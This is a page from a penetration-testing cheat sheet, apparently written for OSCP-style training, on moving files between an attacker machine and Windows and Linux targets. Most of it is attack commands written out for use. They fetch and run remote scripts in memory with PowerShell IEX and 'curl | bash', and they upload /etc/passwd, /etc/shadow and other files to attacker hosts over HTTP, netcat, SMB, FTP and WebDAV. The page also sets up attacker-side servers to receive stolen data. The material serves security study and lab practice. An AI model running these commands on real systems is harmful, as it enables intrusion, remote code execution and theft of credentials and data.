📁File Transfer
For more detailed methods: https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/
Use my transfile.sh script from here
Windows
Powershell
Download file
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/exploit.exe', 'exploit.exe')Download and execute without saving on disk
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/test.ps1')To encode using powershell:
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))To upload using powershell
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')Invoke-FileUpload -Uri http://10.10.14.24:80/upload -File C:\Windows\System32\drivers\etc\hostsCMD
certutil -urlcache -f ${file url} filenamepowershell wget -Uri http://192.168.45.183/plink.exe -OutFile C:\Windows\Temp\plink.exeLinux and Windows
Python Server
Attacker:
updog -p 80OR
python3 -m uploadserverTarget:
Download
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Path\to\fileUpload:
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecureTo base64 encode:
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Path\to\file' -Encoding Byte))
Invoke-WebRequest -Uri http://<ip>:8000/ -Method POST -Body $b64Apache Server
sudo systemctl start apache2sudo cp /path/to/file.exe /var/www/html/powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exeSMB
Attacker:
impacket-smbserver NAME $(pwd) -smb2support -user aditya -password adityaTarget(powershell):
copy \\192.168.220.133\share\nc.exenet use n: \\10.10.14.24\share /user:test testor
$pass = convertto-securestring 'aditya' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential{'aditya',$pass}
New-PSDrive -Name aditya -PSProvide FileSystem -Credential $cred -Root \\10.10.14.24\aditya
cd aditya:FTP :
Attacker : To Host
python -m pyftpdlib 21Target:
ftp ${IP}To Upload:
Attacker:
sudo python3 -m pyftpdlib --port 21 --writeTarget:
(New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Path\to\File')echo open 192.168.49.128 > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128
Log in with USER and PASS first.
ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> byeWebdav (If port 445 restrictions present)
Attcker:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous target:
dir \\192.168.49.128\DavWWWRootcopy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\Linux
If no write permissions:
curl 10.10.14.22/linpeas.sh | bashBash
#Connect to the Target Webserver
exec 3<>/dev/tcp/10.10.10.32/80
#HTTP GET Request
echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3
#Print the Response
cat <&3Netcat
To read files:
nc -nv 192.168.49.249 80 < /etc/passwdTo receive:
nc -nlvp 80Using netcat to send files:
Target
nc -l -p 1234 -q 1 > something.zip < /dev/nullAttack
cat something.zip | netcat <ip> 1234SSH
If creds are available
scp linenum.sh user@remotehost:/remote/path/Base64
Linux
To get base64 output of the file:
base64 file -w 0Decrypt
echo "base64 string" | base64 -d > filePowershell
[IO.File]::WriteAllBytes("C:\Users\Public\filename", [Convert]::FromBase64String("base64string"))Last updated
Was this helpful?